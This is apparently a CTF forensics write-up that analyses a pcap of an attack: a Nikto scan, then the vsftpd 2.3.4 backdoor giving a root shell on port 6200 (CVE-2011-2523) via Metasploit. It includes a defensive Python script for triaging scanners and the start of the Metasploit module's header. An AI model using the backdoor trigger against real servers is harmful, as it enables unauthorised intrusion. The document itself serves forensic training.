As a SOC analyst, analyze the pcap file &#x26; identify the issues.</p>\n<p>So let’s start with the basics.</p>\n<p>What is the victim &#x26; attacker IP?</p>\n</blockquote>\n<p>This is a series of challenges built around a single pcap file.</p>\n<p>The first question asks for the victim and attacker IP addresses.</p>\n<p>Both can be read off the HTTP requests whose URLs look like attack probes: the host sending those requests is the attacker, and the host receiving them is the victim.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/ecb59ca0262eb9ab481364f1e09fe759/58354/image-20240121183054187.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 52.916666666666664%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/ecb59ca0262eb9ab481364f1e09fe759/8ac56/image-20240121183054187.webp 240w,\n/static/ecb59ca0262eb9ab481364f1e09fe759/d3be9/image-20240121183054187.webp 480w,\n/static/ecb59ca0262eb9ab481364f1e09fe759/e46b2/image-20240121183054187.webp 960w,\n/static/ecb59ca0262eb9ab481364f1e09fe759/29105/image-20240121183054187.webp 1396w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/ecb59ca0262eb9ab481364f1e09fe759/8ff5a/image-20240121183054187.png 240w,\n/static/ecb59ca0262eb9ab481364f1e09fe759/e85cb/image-20240121183054187.png 480w,\n/static/ecb59ca0262eb9ab481364f1e09fe759/d9199/image-20240121183054187.png 
960w,\n/static/ecb59ca0262eb9ab481364f1e09fe759/58354/image-20240121183054187.png 1396w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/ecb59ca0262eb9ab481364f1e09fe759/d9199/image-20240121183054187.png\"\n            alt=\"image-20240121183054187\"\n            title=\"image-20240121183054187\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Looking at this packet, we can see that it is carrying out a web-scan-like attack.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/d418a3b4457b5372b78bbf1f3d18eb53/d4b10/image-20240121183137392.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 59.583333333333336%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/d418a3b4457b5372b78bbf1f3d18eb53/8ac56/image-20240121183137392.webp 240w,\n/static/d418a3b4457b5372b78bbf1f3d18eb53/d3be9/image-20240121183137392.webp 480w,\n/static/d418a3b4457b5372b78bbf1f3d18eb53/e46b2/image-20240121183137392.webp 960w,\n/static/d418a3b4457b5372b78bbf1f3d18eb53/7f80f/image-20240121183137392.webp 1394w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            
srcset=\"/static/d418a3b4457b5372b78bbf1f3d18eb53/8ff5a/image-20240121183137392.png 240w,\n/static/d418a3b4457b5372b78bbf1f3d18eb53/e85cb/image-20240121183137392.png 480w,\n/static/d418a3b4457b5372b78bbf1f3d18eb53/d9199/image-20240121183137392.png 960w,\n/static/d418a3b4457b5372b78bbf1f3d18eb53/d4b10/image-20240121183137392.png 1394w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/d418a3b4457b5372b78bbf1f3d18eb53/d9199/image-20240121183137392.png\"\n            alt=\"image-20240121183137392\"\n            title=\"image-20240121183137392\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>So the correct flag was <code class=\"language-text\">KCTF{192.168.1.8_192.168.1.7}</code>.</p>\n<h3 id=\"basic-enumforensic\" style=\"position:relative;\"><a href=\"#basic-enumforensic\" aria-label=\"basic enumforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Basic Enum(Forensic)</h3>\n<blockquote>\n<p>What tool did the attacker use to do basic enumeration of the server?</p>\n<p>Please use the attachment of the first challenge.</p>\n<p>Flag Format: KCTF{toolname}</p>\n</blockquote>\n<p>In the next problem, we need to identify the tool used to perform the web scan.</p>\n<p><span\n      
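The triage behind the Vicker IP and Basic Enum answers, as an added example that is not part of the original post. It works on HTTP request metadata exported from the pcap (for instance with <code>tshark -r capture.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.request.uri -e http.user_agent</code>) and answers both questions at once: which source-to-destination flow behaves like a scanner, and which tool it is. The sample export is constructed; the 10.0.0.x addresses are made up and are not the ones from the challenge capture. Nikto's default User-Agent names the tool and a test number, which is why it is so easy to spot, but the UA is configurable, so the path-based evidence the write-up uses (requests for files containing the string Nikto) is worth checking as well.

```python
# Added example for the Vicker IP / Basic Enum write-ups; not code from the
# original post. Input format: tshark "-T fields" output with the columns
# ip.src, ip.dst, http.request.uri, http.user_agent (tab-separated).
# SAMPLE_EXPORT is constructed; the 10.0.0.x hosts are invented.
from collections import Counter, defaultdict

# Substrings seen in the default User-Agent (or probe paths) of common scanners,
# matched case-insensitively. Nikto's default UA looks like
# "Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:000001)"; a scanner run with
# a custom UA will not match and identify_tool() then returns None.
TOOL_SIGNATURES = {
    "nikto": ("nikto",),
    "sqlmap": ("sqlmap",),
    "gobuster": ("gobuster",),
    "nmap": ("nmap scripting engine",),
}

SAMPLE_EXPORT = (
    "10.0.0.5\t10.0.0.20\t/\tMozilla/5.0 (X11; Linux x86_64) Firefox/121.0\n"
    "10.0.0.5\t10.0.0.20\t/index.php\tMozilla/5.0 (X11; Linux x86_64) Firefox/121.0\n"
    "10.0.0.9\t10.0.0.20\t/\tMozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:000001)\n"
    "10.0.0.9\t10.0.0.20\t/cgi-bin/\tMozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:000002)\n"
    "10.0.0.9\t10.0.0.20\t/phpmyadmin/\tMozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:000003)\n"
    "10.0.0.9\t10.0.0.20\t/.git/HEAD\tMozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:000004)\n"
    "10.0.0.9\t10.0.0.20\t/admin/\t\n"  # constructed probe with no User-Agent header
    "10.0.0.20\t10.0.0.50\t/update\tDebian APT-HTTP/1.3\n"
)


def parse_export(text):
    """Parse tshark's tab-separated field output into (src, dst, uri, ua) rows."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = line.split("\t")
        fields += [""] * (4 - len(fields))  # a missing header leaves an empty field
        rows.append(tuple(fields[:4]))
    return rows


def find_scanner(rows):
    """Return (attacker, victim): the src->dst flow touching the most distinct
    URIs. A browsing user hits a handful of paths; a scanner walks a wordlist
    of well-known ones against a single host."""
    uris = defaultdict(set)
    for src, dst, uri, _ in rows:
        uris[(src, dst)].add(uri)
    (attacker, victim), _ = max(uris.items(), key=lambda kv: len(kv[1]))
    return attacker, victim


def identify_tool(rows, attacker, victim):
    """Name the scanner from UA/URI signatures on the attacker's requests only;
    returns None when nothing matches."""
    hits = Counter()
    for src, dst, uri, ua in rows:
        if (src, dst) != (attacker, victim):
            continue
        haystack = (ua + " " + uri).lower()
        for tool, needles in TOOL_SIGNATURES.items():
            if any(n in haystack for n in needles):
                hits[tool] += 1
    return hits.most_common(1)[0][0] if hits else None


def triage(text):
    rows = parse_export(text)
    attacker, victim = find_scanner(rows)
    return {"attacker": attacker, "victim": victim,
            "tool": identify_tool(rows, attacker, victim)}


if __name__ == "__main__":
    print(triage(SAMPLE_EXPORT))
```

The distinct-URI heuristic is what the screenshots in this section show by eye: one source hammering one destination with paths it has no business knowing. On a real capture, check the candidate pair against the TCP conversation statistics too, since a scanner that only probes a few paths will not stand out on URI count alone.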
class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/c7d6836a9d0eb7fc03f0875a9fd1a432/bed7a/image-20240121185400349.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 34.166666666666664%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/c7d6836a9d0eb7fc03f0875a9fd1a432/8ac56/image-20240121185400349.webp 240w,\n/static/c7d6836a9d0eb7fc03f0875a9fd1a432/d3be9/image-20240121185400349.webp 480w,\n/static/c7d6836a9d0eb7fc03f0875a9fd1a432/e46b2/image-20240121185400349.webp 960w,\n/static/c7d6836a9d0eb7fc03f0875a9fd1a432/00f91/image-20240121185400349.webp 1437w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/c7d6836a9d0eb7fc03f0875a9fd1a432/8ff5a/image-20240121185400349.png 240w,\n/static/c7d6836a9d0eb7fc03f0875a9fd1a432/e85cb/image-20240121185400349.png 480w,\n/static/c7d6836a9d0eb7fc03f0875a9fd1a432/d9199/image-20240121185400349.png 960w,\n/static/c7d6836a9d0eb7fc03f0875a9fd1a432/bed7a/image-20240121185400349.png 1437w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/c7d6836a9d0eb7fc03f0875a9fd1a432/d9199/image-20240121185400349.png\"\n            alt=\"image-20240121185400349\"\n            title=\"image-20240121185400349\"\n            loading=\"lazy\"\n            
style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Looking at the access history, I found requests to files containing the string Nikto.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/0f1e9cc452e0ffc00603300f31a55c4f/844cc/image-20240121190832240.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 6.666666666666667%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAABCAYAAADeko4lAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAVklEQVQI12NYcWL2/wX7p/1femTm/9Vn5v1ff3HBf5DYpiuL/685O+//hkuL/m+9sRSM15yb93/JkRn/lx2dCVYPUrf16tL/O2+u+L/j5vL/228s+w8As6U99uXL750AAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/0f1e9cc452e0ffc00603300f31a55c4f/8ac56/image-20240121190832240.webp 240w,\n/static/0f1e9cc452e0ffc00603300f31a55c4f/d3be9/image-20240121190832240.webp 480w,\n/static/0f1e9cc452e0ffc00603300f31a55c4f/e46b2/image-20240121190832240.webp 960w,\n/static/0f1e9cc452e0ffc00603300f31a55c4f/83135/image-20240121190832240.webp 1306w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/0f1e9cc452e0ffc00603300f31a55c4f/8ff5a/image-20240121190832240.png 240w,\n/static/0f1e9cc452e0ffc00603300f31a55c4f/e85cb/image-20240121190832240.png 480w,\n/static/0f1e9cc452e0ffc00603300f31a55c4f/d9199/image-20240121190832240.png 960w,\n/static/0f1e9cc452e0ffc00603300f31a55c4f/844cc/image-20240121190832240.png 1306w\"\n            
sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/0f1e9cc452e0ffc00603300f31a55c4f/d9199/image-20240121190832240.png\"\n            alt=\"image-20240121190832240\"\n            title=\"image-20240121190832240\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Therefore, <code class=\"language-text\">KCTF{nikto}</code> was the correct flag.</p>\n<h3 id=\"vulnerable-serviceforensic\" style=\"position:relative;\"><a href=\"#vulnerable-serviceforensic\" aria-label=\"vulnerable serviceforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Vulnerable Service(Forensic)</h3>\n<blockquote>\n<p>What service was vulnerable to the main server?</p>\n<p>Please use the attachment of the first challenge.</p>\n<p>Flag Format: KCTF{service_version} >>all_lower_case</p>\n</blockquote>\n<p>Next, the information needed for the flag appears to be the service with the vulnerability the attacker exploited and its version.</p>\n<p>After reviewing the attack packets, I found that the attacker gained an initial foothold using FTP.</p>\n<p>Looking through the FTP packets one by one, I found the following suspicious packet.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; 
margin-left: auto; margin-right: auto; max-width: 602px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/b53f5bea9523770dd3ddc799009f4e5c/32056/image-20240122215826994.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 73.33333333333334%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/b53f5bea9523770dd3ddc799009f4e5c/8ac56/image-20240122215826994.webp 240w,\n/static/b53f5bea9523770dd3ddc799009f4e5c/d3be9/image-20240122215826994.webp 480w,\n/static/b53f5bea9523770dd3ddc799009f4e5c/ff4b8/image-20240122215826994.webp 602w\"\n              sizes=\"(max-width: 602px) 100vw, 602px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/b53f5bea9523770dd3ddc799009f4e5c/8ff5a/image-20240122215826994.png 240w,\n/static/b53f5bea9523770dd3ddc799009f4e5c/e85cb/image-20240122215826994.png 480w,\n/static/b53f5bea9523770dd3ddc799009f4e5c/32056/image-20240122215826994.png 602w\"\n            sizes=\"(max-width: 602px) 100vw, 602px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/b53f5bea9523770dd3ddc799009f4e5c/32056/image-20240122215826994.png\"\n            alt=\"image-20240122215826994\"\n            title=\"image-20240122215826994\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>This exploits the backdoor embedded in <code class=\"language-text\">vsftpd 2.3.4</code>, a vulnerability where attempting an FTP connection with a 
username containing <code class=\"language-text\">:)</code> opens the backdoor on TCP port 6200.</p>\n<blockquote>\n<p>The source archive for <code class=\"language-text\">vsftpd</code> version 2.3.4, <code class=\"language-text\">vsftpd-2.3.4.tar.gz</code>, included backdoor code that allowed arbitrary code execution from a remote system.\nWhen <code class=\"language-text\">vsftpd</code> is installed and started with the backdoor code included, making an FTP connection with a username containing the specific string <code class=\"language-text\">:)</code> opens the backdoor port, TCP 6200. Connecting to that backdoor port remotely allows arbitrary commands to be executed.</p>\n</blockquote>\n<p>Reference: <a href=\"https://www.intellilink.co.jp/column/vulner/2011/070600.aspx\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Validation Report on the Backdoor Included in vsftpd 2.3.4 | NTT DATA Advanced Technology Corporation</a></p>\n<p>So the correct flag is <code class=\"language-text\">KCTF{vsftpd_2.3.4}</code>. 
(I missed the requirement that it had to be lowercase, so I couldn’t get the flag accepted.)</p>\n<h3 id=\"portforensic\" style=\"position:relative;\"><a href=\"#portforensic\" aria-label=\"portforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>PORT(Forensic)</h3>\n<blockquote>\n<p>What was the port number of the reverse shell of the server?</p>\n<p>Please use the attachment of the first challenge.</p>\n<p>Flag Format: KCTF{port}</p>\n</blockquote>\n<p>The next problem asks for the port on which the attacker obtained a reverse shell as the flag.</p>\n<p>Looking up the vulnerability identified earlier shows that it was 6200.</p>\n<p>Looking in Wireshark, it seems the attacker obtained a shell as the <code class=\"language-text\">root</code> user.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 898px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/779e9cc9373dd50b1e76fbe7d7270e20/84cc5/image-20240122220256038.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 50.416666666666664%; position: relative; bottom: 0; left: 0; background-image: 
url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAAsTAAALEwEAmpwYAAACIklEQVQoz5WSS0+TQRiFv1+gpQWK2gsglMJXeoPSWKkgJBhuFqokQgKJRo0iaKDQlosCbRVixLQWUIQCAUN0hRo1hoUb48aVCzcuXRgX/ojHYZCFRkxcPDnznsmc9yxGsXrLUE+VYq23kF9joqDWjN6bS06ljlxPDkX1RzGfMJJdocXoN2CsPiJng++QuM8Wvo48r154JgzHD6PcScySTmWYvfeIudQK6WSGhfQajxc2WJxfZ/7BimTp4RMWF9bJLG6yLFhdeiq9PX9OZKSTyyjjU2mu9Ue52jskNEJvX5hwJMbk5CzxeJKh4UkGBm8xNjZDKDRBJJIQ3hSjo9OSHT8avU1f/4hEaW87R1XVMbxeH37/SfzVtfh8NVitpej1uZiMBvKEajQH0Go1ZGVpfulBiUazqzqdVpCFkppJ8ePLN75//sr2sxd0nO0iGOykrq4Bu92Ow+HE6XTidrtxuVwC9z64JEo4dJOXm6+YGY/jctgpKDBTWJhPSYmF8vJybDbbf6GMhMYYvB6lPdhFZ+cFursv0dNzhYaGZlRVFS0dsukee0v2W6bcn04yER6hTLVRWemR9d3uCvmguLhINC3GYtllZ1bVst9C/0RJTNxlbT7DxfOXaWwM0NoapKWlnaamwK4Kr7m5TZ4DgQ48Hq9s/rcwGRiLJXm3/Yk3rz+ytfWe51sf2Fh/SzicEF8kzvBwTH6LgRtRAqfPiMCqfwb+BOiBfZEWkNMnAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/779e9cc9373dd50b1e76fbe7d7270e20/8ac56/image-20240122220256038.webp 240w,\n/static/779e9cc9373dd50b1e76fbe7d7270e20/d3be9/image-20240122220256038.webp 480w,\n/static/779e9cc9373dd50b1e76fbe7d7270e20/005c4/image-20240122220256038.webp 898w\"\n              sizes=\"(max-width: 898px) 100vw, 898px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/779e9cc9373dd50b1e76fbe7d7270e20/8ff5a/image-20240122220256038.png 240w,\n/static/779e9cc9373dd50b1e76fbe7d7270e20/e85cb/image-20240122220256038.png 480w,\n/static/779e9cc9373dd50b1e76fbe7d7270e20/84cc5/image-20240122220256038.png 898w\"\n            sizes=\"(max-width: 898px) 100vw, 898px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/779e9cc9373dd50b1e76fbe7d7270e20/84cc5/image-20240122220256038.png\"\n            alt=\"image-20240122220256038\"\n            title=\"image-20240122220256038\"\n            
loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>The correct flag is <code class=\"language-text\">KCTF{6200}</code>.</p>\n<h3 id=\"cve-idforensic\" style=\"position:relative;\"><a href=\"#cve-idforensic\" aria-label=\"cve idforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>CVE ID(Forensic)</h3>\n<blockquote>\n<p>What’s the CVE id for the vulnerable service?</p>\n<p>Please use the attachment of the first challenge.</p>\n</blockquote>\n<p>Again, based on the vulnerability research, we can determine that the correct flag is <code class=\"language-text\">KCTF{CVE-2011-2523}</code>.</p>\n<p>Reference: <a href=\"https://www.exploit-db.com/exploits/49757\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">vsftpd 2.3.4 - Backdoor Command Execution - Unix remote Exploit</a></p>\n<h3 id=\"famous-toolforensic\" style=\"position:relative;\"><a href=\"#famous-toolforensic\" aria-label=\"famous toolforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 
3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Famous Tool(Forensic)</h3>\n<blockquote>\n<p>The attacker used a popular tool to gain access of the server. Can you name it?</p>\n</blockquote>\n<p>This challenge asks us to identify the famous tool the attacker used to gain access to the server.</p>\n<p>Since we already know the vulnerability, searching for something like <code class=\"language-text\">vsftpd 2.3.4 backdoor tool</code> shows that most of the top results are Metasploit.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 682px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/b2485a4ccc1936b8efb5b7c4b315f79a/160a3/image-20240122221711629.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 101.25%; position: relative; bottom: 0; left: 0; background-image: 
url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAUCAYAAACNiR0NAAAACXBIWXMAAAsTAAALEwEAmpwYAAACYklEQVQ4y5VUi5KiMBDk/7/xPF1FFgRJQiCEZ990AAst3btL1VRiMD2T7p5EheqhsxhlUYCjaRpoo1HXNcqyhDEV+r4P3+Z5DvM4jui6HnXTo2l7uG7CNqJWNqxWAuTQdx1a7wOYc62Eg5P9jvttG4C9rAnGb53s8bvvBng5x4RR33eSyWEYBmit4VsfDvMAZ1bofQelVEhibR0OV1UVwDkzgVZaMEZEXT/IQb9WJNEuMz8y4zTNT/PnWCiJRu9gK43GNXJoxDgNAkbOZrwbG8Cn71FrHa7nHMdjivRbIb4UyDKNLNWI4xJ5XknFQofywvPwFnwfUZ4bHH+nuJwLnE5pAL5cbvj6WiKOcyRJEdZZWgpnVng1ciP3UvFaoZOrKl2KMFbUtUK6CbapKiOhg1DWViJKCQpI8ag2rfMKGCqkIPTeJsrmuf8dG2hE2bPshruYOBdz13WzqjoFZZd5+ovCuwrJhdYm8MLZWovyXkCVSq6pcb8Lb7I3js8JtoS8Oml4ANLArJJAnMNaOuUny+yDwHs+I/IWVBMeCUYRqGQjV+cegwnYDZvBp3mJt4DNWiH7d6syrCsbgNlqTNiGXsVbPrn3dGUCGbEJK9muzQrNuiZwt3tx9sG+Zs8/AP+Vq0/Bl2ifLOrlOk7MHCoUI9PoM7ZeXeK1G1699+RDldxxltY7HBIcfiXSepl4skJyVdJyJYrCPEj/+bFYKyx1g7M8CDx8ErDTKUOaFgL8jav08fV6Cz6kUNqYwKeWN5JC8a2kP58q9K2TPwvxcu2ln6ull/m7XoD4Nu4NzYq32FfH8QeMIhhAdhj1iQAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/b2485a4ccc1936b8efb5b7c4b315f79a/8ac56/image-20240122221711629.webp 240w,\n/static/b2485a4ccc1936b8efb5b7c4b315f79a/d3be9/image-20240122221711629.webp 480w,\n/static/b2485a4ccc1936b8efb5b7c4b315f79a/57e27/image-20240122221711629.webp 682w\"\n              sizes=\"(max-width: 682px) 100vw, 682px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/b2485a4ccc1936b8efb5b7c4b315f79a/8ff5a/image-20240122221711629.png 240w,\n/static/b2485a4ccc1936b8efb5b7c4b315f79a/e85cb/image-20240122221711629.png 480w,\n/static/b2485a4ccc1936b8efb5b7c4b315f79a/160a3/image-20240122221711629.png 682w\"\n            sizes=\"(max-width: 682px) 100vw, 682px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/b2485a4ccc1936b8efb5b7c4b315f79a/160a3/image-20240122221711629.png\"\n            
alt=\"image-20240122221711629\"\n            title=\"image-20240122221711629\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p><code class=\"language-text\">KCTF{metasploit}</code> is accepted as-is, but since we have the chance, let’s take a look inside.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\">##\n# $Id<span class=\"token operator\">:</span> vsftpd_234_backdoor<span class=\"token punctuation\">.</span>rb <span class=\"token number\">13099</span> <span class=\"token number\">2011</span><span class=\"token operator\">-</span><span class=\"token number\">07</span><span class=\"token operator\">-</span><span class=\"token number\">05</span> <span class=\"token number\">05</span><span class=\"token operator\">:</span><span class=\"token number\">20</span><span class=\"token operator\">:</span><span class=\"token number\">47</span>Z hdm $\n##\n\n##\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span> <span class=\"token expression\">This file is 